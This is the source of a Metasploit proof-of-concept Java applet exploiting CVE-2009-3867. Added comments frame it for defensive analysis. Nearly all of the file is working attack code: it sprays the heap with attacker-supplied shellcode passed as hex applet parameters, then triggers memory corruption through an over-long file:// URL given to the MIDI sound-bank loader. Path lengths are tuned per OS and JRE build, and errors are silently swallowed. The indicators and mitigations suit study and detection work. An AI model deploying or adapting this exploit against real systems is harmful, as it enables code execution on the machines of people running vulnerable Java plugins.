GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2009-3867/AppletX.java
import javax.sound.midi.*;
import java.io.*;
import java.nio.*;
import java.net.*;
/*
*
* comments from KF on Mac OS X:
*
Spray heap

Invalid memory access of location 0000000f eip=90909090

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0000000f
[Switching to process 385 thread 0x15107]
0x90909090 in _NSReadAttributedStringFromURLOrData ()
(gdb) bt
#0 0x90909090 in _NSReadAttributedStringFromURLOrData ()
#1 0x255a255a in ?? ()
*
*/
/**
 * Proof-of-concept applet for CVE-2009-3867 (metasploit-framework,
 * external/source/exploits/CVE-2009-3867/AppletX.java), annotated here for defensive analysis.
 *
 * What the code visibly does, in order:
 *  1. fills the Java heap with 50 one-MiB IntBuffers, each holding a 4-byte filler pattern
 *     ("np") followed by attacker-supplied bytes ("sc"); both arrive as hex strings in applet
 *     parameters;
 *  2. builds a file:// URL whose path is several hundred '/' characters (length picked per OS
 *     and JRE build, see the inline comments) followed by "Z%Z%Z%Z%Z%Z%";
 *  3. hands that URL to MidiSystem.getSoundbank() and then sleeps forever, since on affected
 *     builds the call is not expected to return.
 *
 * The Mac OS X backtrace in the header comment shows eip at 0x90909090, i.e. execution landed
 * in the sprayed region, and a second frame of 0x255a255a, which is the byte pattern "Z%Z%".
 *
 * Indicators a defender can key on, all taken from this source: an applet tag carrying
 * hex-encoded "sc"/"np" parameters, a file:// URL made almost entirely of slashes, and a sudden
 * ~50 MB heap allocation inside the browser plugin. Mitigation is an up-to-date JRE and removal
 * of the browser Java plugin; the builds the author tuned against are named in the comments.
 */
public class AppletX extends java.applet.Applet
{
    // Spray buffers returned by spray(); held in a field, presumably so they stay reachable
    // (and un-collected) while the trigger below runs.
    private IntBuffer [] mem;

    /**
     * Applet entry point: picks the path length by OS, sprays the heap, then triggers the bug.
     * Reads applet parameters "sc" and "np" (hex strings) through getParameter(). Any exception
     * is printed with System.out.println and otherwise swallowed, so a failed attempt leaves no
     * error visible to the hosting page.
     */
    public void init()
    {
        String fName = "";

        // Default length; every branch below either overwrites it or returns, so 303 is
        // effectively never used.
        fName = repeat('/', 303);

        // detect OS
        // os.name is lower-cased so the substring tests below are case-insensitive.
        String os = System.getProperty("os.name").toLowerCase();
        if (os.indexOf( "win" ) >= 0)
            fName = repeat('/', 302); // 1.6.0_u16,u11
            // fName = repeat('/', 304); // 1.5.0_u21 (problems lurking)
        else if (os.indexOf( "mac" ) >= 0)
            //fName = repeat('/',1118); // OSX Snow Leopard
            fName = repeat('/',1080); // OSX Leopard
        else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0)
            fName = repeat('/', 1337); // not tested
        else
            // not supported
            return;

        // heap sprayed info starts at 0x25580000+12 but we need to be fairly ascii safe. 0x80 will not fly
        // fName = "file://" + fName + "$\"$\"$\"$\"$\"$\""; // 1.5.x
        // "Z%" is the byte pair 0x5a 0x25; repeated, it reads as 0x255a255a, the value that
        // appears as frame #1 in the header backtrace.
        fName = "file://" + fName + "Z%Z%Z%Z%Z%Z%";

        // trigger vuln
        try
        {
            // ~50 MB of IntBuffers built from the two hex-encoded applet parameters.
            mem = spray(getParameter("sc"), getParameter("np"));
            // System.out.println("Sprayed!");

            // The trigger: the over-long file:// URL goes to the sound-bank loader. The
            // author's comment below says this call does not normally return on affected JREs.
            MidiSystem.getSoundbank(new URL(fName));

            // just in case, thread doesn't typically return from above :)
            while (true)
            {
                Thread.sleep(10);
            }
        }
        catch(Exception e)
        {
            // Diagnostic only; nothing is rethrown.
            System.out.println(e);
        }
    }


    /**
     * Returns a string made of {@code i} copies of {@code c} (empty when {@code i <= 0}).
     * Built by repeated concatenation, which is quadratic but irrelevant at these sizes.
     *
     * @param c character to repeat
     * @param i number of repetitions
     * @return the repeated string
     */
    public static String repeat(char c,int i)
    {
        String tst = "";

        for (int j = 0; j < i; j++)
        {
            tst = tst+c;
        }
        return tst;
    }


    // based on:
    // http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
    /**
     * Decodes a hex string into one short per encoded byte (values 0..255 stored in a short).
     *
     * Caveats visible in the code: an odd-length input throws StringIndexOutOfBoundsException
     * at {@code charAt(i + 1)}; a non-hex character makes Character.digit return -1, which the
     * {@code & 0xff} mask turns into 0xff instead of an error, so the decoded value silently
     * exceeds a byte.
     *
     * @param s even-length string of hex digits
     * @return decoded values, one per pair of input characters
     */
    public static short[] HexDecode(String s)
    {
        short[] data = new short[s.length()/2];

        for (int i = 0; i < s.length(); i += 2)
        {
            char c1 = s.charAt(i);
            char c2 = s.charAt(i + 1);

            int comb = Character.digit(c1, 16) & 0xff;
            comb <<= 4;
            comb += Character.digit(c2, 16) & 0xff;
            data[i/2] = (short)comb;
        }
        return data;
    }

    /**
     * Convenience overload: hex-decodes both parameters and delegates to
     * {@link #spray(short[], short[])}.
     *
     * @param sc hex-encoded payload bytes (applet parameter "sc")
     * @param np hex-encoded 4-byte filler pattern (applet parameter "np")
     * @return the allocated spray buffers
     */
    public final IntBuffer [] spray(String sc, String np)
    {
        short [] sc_bytes = HexDecode(sc);
        short [] np_bytes = HexDecode(np);

        return spray (sc_bytes, np_bytes);
    }

    /**
     * Allocates 50 IntBuffers of 1 MiB each (~50 MB total) and fills each with the 4-byte
     * {@code np} pattern followed by {@code sc}, packing four values per int with element 0 in
     * the least-significant byte.
     *
     * Notes from reading the code: {@code nops} is counted in ints while {@code sc.length} is
     * counted in bytes, so each buffer is left partly unfilled at its end; the second inner loop
     * consumes four shorts per iteration and checks the index only at the top, so an
     * {@code sc} whose length is not a multiple of four throws ArrayIndexOutOfBoundsException;
     * only np[0..3] are read, any further elements are ignored.
     *
     * @param sc payload bytes, one per short
     * @param np filler pattern, at least four shorts
     * @return the 50 filled buffers, so the caller can keep them reachable
     */
    public final IntBuffer [] spray(short[] sc, short[] np)
    {
        int cnt = 50; // total 50 mb
        int sz = 1024*1024; // 1 mb
        // Number of filler ints per buffer; sc.length is subtracted as-is (bytes, not ints).
        int nops = (sz / 4) - (sc.length);

        IntBuffer [] ret = new IntBuffer[cnt];

        for (int bi = 0; bi < cnt; bi++)
        {
            IntBuffer ib = IntBuffer.allocate(sz / 4);

            // Filler: the same int (np[0] low byte .. np[3] high byte) written nops times.
            for (int i = 0; i < nops; ++i)
                ib.put((np[0]
                    | (np[1] << 8)
                    | (np[2] << 16)
                    | (np[3] << 24)));
            // ib.put(0x90909090);

            // Payload: four consecutive shorts per int, same byte order as above.
            for (int i = 0; i < sc.length; )
                ib.put((sc[i++]
                    | (sc[i++] << 8)
                    | (sc[i++] << 16)
                    | (sc[i++] << 24)));
            ret[bi] = ib;
        }
        return ret;
    }
}